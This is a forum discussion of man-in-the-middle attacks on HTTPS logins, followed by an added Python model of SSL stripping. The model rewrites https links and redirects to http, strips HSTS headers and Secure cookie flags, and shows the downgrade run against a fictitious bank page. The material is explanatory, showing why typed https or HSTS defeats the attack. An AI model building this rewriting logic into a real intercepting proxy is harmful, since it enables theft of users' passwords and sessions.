so... how about browsers warn when they're pulling an address off a DNS they've never heard of, and that isn't listed and isn't verified? Wouldn't that be a much saner way of dealing with the problem?
DNS has nothing to do with it. They can ARP-spoof your machine into thinking their machine is the gateway. Then all your traffic goes through their machine. If you don't verify certificates, then they could just present you a self-signed cert that they used to decrypt your requests, then re-encrypt them and forward them to the real site. If your browser didn't warn you, you'd never know.
Seriously, watch the video. Even though your browser warns you, you're still very vulnerable. If you just type bankofamerica.com, anybody on your network could easily trick you into divulging your password. You have to type the "https" in yourself and trust that your browser verifies certificates correctly.
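The attack the reply above is describing (the victim types a bare hostname, the browser starts with plain HTTP, and the on-path attacker silently turns every https:// link and redirect in the response into http:// while talking HTTPS to the real site itself) is easy to model. The following is an added example written for this thread, not code from any poster or from the tool shown in the video; the bank page, the hostnames (example-bank.test) and the headers are constructed, and the `browser_starts_with_tls` helper is a simplified model of when a browser's first request is already TLS (the user typed https, or the host is in an HSTS list), which is the only thing that keeps the attacker from ever seeing cleartext.

```python
import re
from urllib.parse import urlsplit

# Matches an https:// URL inside an attribute value or header until the next quote/space/bracket.
HTTPS_URL = re.compile(r'https://[^\s"\'<>]+', re.IGNORECASE)


class DowngradeRewriter:
    """Models the on-path attacker from the thread: the victim speaks plain HTTP to the
    attacker, the attacker speaks HTTPS to the real site, and every https:// reference in
    what comes back is rewritten to http:// so the victim never leaves cleartext."""

    def __init__(self):
        self.stripped = set()  # https URLs the attacker has downgraded so far

    def rewrite_body(self, body):
        """Rewrite https:// links, form actions and script sources in an HTML body."""
        def downgrade(match):
            url = match.group(0)
            self.stripped.add(url)
            return "http://" + url[len("https://"):]
        return HTTPS_URL.sub(downgrade, body)

    def rewrite_headers(self, headers):
        """Rewrite the response headers that would otherwise push the browser back to TLS."""
        out = {}
        for name, value in headers.items():
            lowered = name.lower()
            if lowered == "location" and value.lower().startswith("https://"):
                self.stripped.add(value)
                value = "http://" + value[len("https://"):]
            elif lowered == "strict-transport-security":
                continue  # drop HSTS so the browser never learns the site wants https only
            elif lowered == "set-cookie":
                # a Secure cookie would not be sent over http, so the flag is removed too
                value = re.sub(r";\s*secure\b", "", value, flags=re.IGNORECASE)
            out[name] = value
        return out

    def upstream_url(self, requested):
        """Map the victim's http:// request back to the https:// URL the real site expects."""
        if requested.lower().startswith("http://"):
            candidate = "https://" + requested[len("http://"):]
            if candidate in self.stripped:
                return candidate
        return requested


def browser_starts_with_tls(typed, hsts_hosts):
    """True if the browser's very first request is already HTTPS, so there is no cleartext
    hop for the attacker to rewrite: the user typed https:// or the host is in an HSTS list
    (assumed model; real browsers also consult a preload list)."""
    if typed.lower().startswith("https://"):
        return True
    host = urlsplit(typed if "://" in typed else "http://" + typed).hostname
    return host in hsts_hosts


# Constructed sample response from a fictitious bank login page.
SAMPLE_HEADERS = {
    "Content-Type": "text/html",
    "Strict-Transport-Security": "max-age=31536000",
    "Set-Cookie": "session=abc; Secure; HttpOnly",
}
SAMPLE_BODY = """<html><body>
<a href="https://www.example-bank.test/login">Sign in</a>
<form action="https://www.example-bank.test/auth" method="post">
<input name="user"><input name="pass" type="password"></form>
<script src="https://cdn.example-bank.test/app.js"></script>
<a href="http://www.example-bank.test/about">About</a>
</body></html>"""


if __name__ == "__main__":
    attacker = DowngradeRewriter()
    print(attacker.rewrite_body(SAMPLE_BODY))
    print(attacker.rewrite_headers(SAMPLE_HEADERS))
    print("password form now posts to:", attacker.upstream_url("http://www.example-bank.test/auth"))
    print("typed bare hostname, safe?", browser_starts_with_tls("www.example-bank.test", set()))
    print("typed https, safe?", browser_starts_with_tls("https://www.example-bank.test", set()))
```

The point of the model is the last two lines: nothing the rewriter does is visible to the victim as a certificate error, because the victim's browser never negotiates TLS at all. The password form posts to an http:// URL the attacker owns the path for, and the attacker completes the HTTPS leg to the real site with a perfectly valid certificate on its own connection.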